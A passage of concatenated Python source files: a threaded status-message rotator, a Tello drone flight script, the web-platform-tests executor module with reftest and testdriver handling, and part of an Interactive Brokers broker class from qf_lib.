response = 'ok - got {} and {} --- message queue content: {}'.format(data1, data2, length)
#do something else here, too, if necessary
return jsonify(status=response)
class StatusMessages:
def __init__(self, instance, max_delay):
self.t = Thread(target=self.__worker, args=())
self.max_delay = max_delay
self.instance = instance
self.delay = randint(0, self.max_delay)
self.statusmessage1 = "Meldung 1 von " + self.instance
self.statusmessage2 = "Meldung 2"
self.statusmessage3 = "Meldung 3"
self.statusmessage4 = "Meldung 4"
self.counter = 0
self.__update()
def add(self, newmessage):
self.statusmessage4 = self.statusmessage3
self.statusmessage3 = self.statusmessage2
self.statusmessage2 = self.statusmessage1
self.statusmessage1 = newmessage
#print("Nach " + str(newmessage) + " Sekunden eine Meldung hinzugefuegt.\n")
def __update(self):
self.t.start()
def __worker(self):
self.add(self.delay)
self.counter += 1
print(" ---- " + self.instance + " ---- Counter: " + str(self.counter) + " ----")
print("Meldung 1: " + str(self.statusmessage1) )
print("Meldung 2: " + str(self.statusmessage2) )
print("Meldung 3: " + str(self.statusmessage3) )
print("Meldung 4: " + str(self.statusmessage4) + "\n")
time.sleep(self.delay)
self.delay = randint(0, self.max_delay)
self.t = Thread(target=self.__worker, args=())
self.__update()
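# Design note (descriptive only): each __worker run pushes the elapsed delay as
# the newest message, prints the current four messages, sleeps for a random
# delay, then hands off to a brand-new thread via __update(), so every
# StatusMessages instance keeps rotating messages for the life of the process.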
sm = StatusMessages("sm", 5)
sm2 = StatusMessages("sm2", 3)
if __name__ == '__main__':
#app.run(debug=True, threaded=True)
sm.add("Testnachricht")
sm2.add("Nachricht aus dem zweiten Objekt")
|
fly_test.py
|
from time import sleep
from tello import Tello
import threading
def _telloA():
tello = Tello('192.168.50.201',8889)
tello.send_command('command')
sleep(1)
tello.send_command('speed 80')
sleep(1)
tello.send_command('battery?')
sleep(1)
tello.send_command('takeoff')
sleep(2)
tello.send_command('up 150')
sleep(1)
for i in range(2):
tello.send_command('forward 200')
sleep(1)
tello.send_command('left 200')
sleep(1)
tello.send_command('back 200')
sleep(1)
tello.send_command('right 200')
sleep(1)
tello.send_command('land')
'''
def _telloB():
tello = Tello('192.168.50.201',9000)
tello.send_command('command')
sleep(0.1)
tello.send_command('speed 80')
sleep(0.1)
tello.send_command('battery?')
sleep(0.1)
tello.send_command('takeoff')
sleep(2)
tello.send_command('up 50')
sleep(1)
tello.send_command('forward 300')
sleep(1)
tello.send_command('left 250')
sleep(1)
tello.send_command('right 250')
sleep(1)
tello.send_command('back 300')
sleep(1)
tello.send_command('land')
'''
def main():
print('start :)')
thread_telloA = threading.Thread(target=_telloA, name='T1')
thread_telloA.start()
'''
sleep(3)
thread_telloB = threading.Thread(target=_telloB, name='T2')
thread_telloB.start()
'''
if __name__ == '__main__':
main()
|
base.py
|
import base64
import hashlib
from six.moves.http_client import HTTPConnection
import io
import json
import os
import threading
import traceback
import socket
import sys
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
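# Illustrative sketch (not used by the harness): hash_screenshot() operates on
# the base64-encoded screenshot payloads that executors report; any base64 input
# yields a 40-character sha1 hex digest. The payload below is a made-up placeholder.
def _example_hash_usage():
    fake_screenshot = base64.b64encode(b"not really a PNG").decode("ascii")
    return hash_screenshot(fake_screenshot)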
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.logger = logger
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the timeout multiplier since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
finished = self.result_flag.wait(self.timeout + 2 * self.extra_timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive:
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc())
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc()
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
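# Descriptive note (inferred from the checks above): ``fuzzy`` is a pair of
# (min, max) ranges, (per-channel difference, number of differing pixels),
# e.g. ((0, 2), (0, 10)): the comparison counts as equal when the observed
# maximum per-channel difference and differing-pixel count fall inside those ranges.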
def get_differences(self, screenshots):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes, screenshots, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
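
# Hedged usage sketch (the callable, session dict and path below are made up for
# illustration; they are not part of this module): WdspecRun executes a callable in a
# worker thread and reports EXTERNAL-TIMEOUT if it does not finish in time.
def _example_wdspec_run():
    def fake_wdspec(session_config, path, timeout):
        return ("OK", [])

    success, data = WdspecRun(fake_wdspec, {"host": "127.0.0.1"}, "/tmp/test.py", 5).run()
    # success is True and data == ("OK", []) unless the callable raised or timed out.
    return success, data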
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that differ more substantially from WebDriver may need a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
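
# Hedged sketch (logger, protocol and test_window stand in for the real wptrunner
# objects; the URL and payload values are illustrative): one testdriver "action"
# message dispatched through CallbackHandler.
def _example_callback_dispatch(logger, protocol, test_window):
    handler = CallbackHandler(logger, protocol, test_window)
    message = ("http://web-platform.test/test.html", "action",
               {"action": "click", "selector": "#button"})
    done, rv = handler(message)
    # For actions, done is False; the outcome is reported back to the page via
    # protocol.testdriver.send_message("complete", "success", ...).
    return done, rv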
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
|
ib_broker.py
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread, Event, Lock
from typing import List, Sequence, Optional, Set
from ibapi.client import EClient
from ibapi.contract import ContractDetails
from ibapi.order import Order as IBOrder
from pandas import to_datetime
from qf_lib.backtesting.broker.broker import Broker
from qf_lib.backtesting.contract.contract_to_ticker_conversion.ib_contract_ticker_mapper import IBContractTickerMapper
from qf_lib.backtesting.order.execution_style import MarketOrder, StopOrder
from qf_lib.backtesting.order.order import Order
from qf_lib.backtesting.order.time_in_force import TimeInForce
from qf_lib.backtesting.portfolio.broker_positon import BrokerPosition
from qf_lib.common.exceptions.broker_exceptions import BrokerException, OrderCancellingException
from qf_lib.common.utils.logging.qf_parent_logger import ib_logger
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.interactive_brokers.ib_contract import IBContract
from qf_lib.interactive_brokers.ib_wrapper import IBWrapper
class IBBroker(Broker):
"""
Interactive Brokers Broker class. Its main purpose is to connect to the Interactive Brokers API and to send
orders. It also provides functionality to retrieve, among others, the currently open positions and the
value of the portfolio.
Parameters
-----------
contract_ticker_mapper: IBContractTickerMapper
mapper which provides the functionality to map a ticker from any data provider
(BloombergTicker, PortaraTicker etc.) onto a contract object from the Interactive Brokers API
clientId: int
id of the Broker client
host: str
IP address
port: int
socket port
"""
def __init__(self, contract_ticker_mapper: IBContractTickerMapper, clientId: int = 0, host: str = "127.0.0.1",
port: int = 7497):
super().__init__(contract_ticker_mapper)
self.logger = ib_logger.getChild(self.__class__.__name__)
# Lock that synchronizes entry into the methods and makes sure we have synchronous communication
# with the client
self.lock = Lock()
self.orders_placement_lock = Lock()
self.waiting_time = 30 # expressed in seconds
# Event that informs us that the wrapper has received the response
self.action_event_lock = Event()
self.wrapper = IBWrapper(self.action_event_lock, contract_ticker_mapper)
self.client = EClient(wrapper=self.wrapper)
self.clientId = clientId
self.client.connect(host, port, self.clientId)
# Run the client in a separate thread so that the execution of the program can go on.
# Now we will have 3 threads:
# - thread of the main program
# - thread of the client
# - thread of the wrapper
thread = Thread(target=self.client.run)
thread.start()
# This will be released after the client initialises and the wrapper receives the nextValidOrderId
if not self._wait_for_results():
raise ConnectionError("IB Broker was not initialized correctly")
def get_portfolio_value(self) -> float:
with self.lock:
request_id = 1
self._reset_action_lock()
self.client.reqAccountSummary(request_id, 'All', 'NetLiquidation')
wait_result = self._wait_for_results()
self.client.cancelAccountSummary(request_id)
if wait_result:
return self.wrapper.net_liquidation
else:
error_msg = 'Time out while getting portfolio value'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_portfolio_tag(self, tag: str) -> float:
with self.lock:
request_id = 2
self._reset_action_lock()
self.client.reqAccountSummary(request_id, 'All', tag)
wait_result = self._wait_for_results()
self.client.cancelAccountSummary(request_id)
if wait_result:
return self.wrapper.tmp_value
else:
error_msg = 'Time out while getting portfolio tag: {}'.format(tag)
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_positions(self) -> List[BrokerPosition]:
with self.lock:
self._reset_action_lock()
self.wrapper.reset_position_list()
self.client.reqPositions()
if self._wait_for_results():
return self.wrapper.position_list
else:
error_msg = 'Time out while getting positions'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_liquid_hours(self, contract: IBContract) -> QFDataFrame:
""" Returns a QFDataFrame containing information about liquid hours of the given contract. """
with self.lock:
self._reset_action_lock()
request_id = 3
self.client.reqContractDetails(request_id, contract)
if self._wait_for_results():
contract_details = self.wrapper.contract_details
liquid_hours = contract_details.tradingHours.split(";")
liquid_hours_df = QFDataFrame.from_records(
[hours.split("-") for hours in liquid_hours if not hours.endswith("CLOSED")], columns=["FROM", "TO"]
)
for col in liquid_hours_df.columns:
liquid_hours_df[col] = to_datetime(liquid_hours_df[col], format="%Y%m%d:%H%M")
liquid_hours_df.name = contract_details.contract.symbol
return liquid_hours_df
else:
error_msg = 'Time out while getting contract details'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_contract_details(self, contract: IBContract) -> ContractDetails:
with self.lock:
self._reset_action_lock()
request_id = 4
self.client.reqContractDetails(request_id, contract)
if self._wait_for_results():
return self.wrapper.contract_details
else:
error_msg = 'Time out while getting contract details'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def place_orders(self, orders: Sequence[Order]) -> Sequence[int]:
with self.orders_placement_lock:
open_order_ids = {o.id for o in self.get_open_orders()}
order_ids_list = []
for order in orders:
self.logger.info('Placing Order: {}'.format(order))
order_id = self._execute_single_order(order) or self._find_newly_added_order_id(order, open_order_ids)
if order_id is None:
error_msg = f"Not able to place order: {order}"
self.logger.error(error_msg)
raise BrokerException(error_msg)
else:
order_ids_list.append(order_id)
return order_ids_list
def cancel_order(self, order_id: int):
with self.lock:
self.logger.info('Cancel order: {}'.format(order_id))
self._reset_action_lock()
self.wrapper.set_cancel_order_id(order_id)
self.client.cancelOrder(order_id)
if not self._wait_for_results():
error_msg = 'Time out while cancelling order id {} : \n'.format(order_id)
self.logger.error(error_msg)
raise OrderCancellingException(error_msg)
def get_open_orders(self) -> List[Order]:
with self.lock:
self._reset_action_lock()
self.wrapper.reset_order_list()
self.client.reqOpenOrders()
if self._wait_for_results():
return self.wrapper.order_list
else:
error_msg = 'Timeout while getting open orders'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def cancel_all_open_orders(self):
"""
There is no way to check whether cancelling all orders has finished.
One can only request the open orders and confirm that the list is empty.
"""
with self.lock:
self.client.reqGlobalCancel()
self.logger.info('cancel_all_open_orders')
def stop(self):
""" Stop the Broker client and disconnect from the interactive brokers. """
with self.lock:
self.client.disconnect()
self.logger.info("Disconnecting from the interactive brokers client")
def _find_newly_added_order_id(self, order: Order, order_ids_existing_before: Set[int]):
""" Given the list of order ids open before placing the given order, try to compute the id of the recently
placed order. """
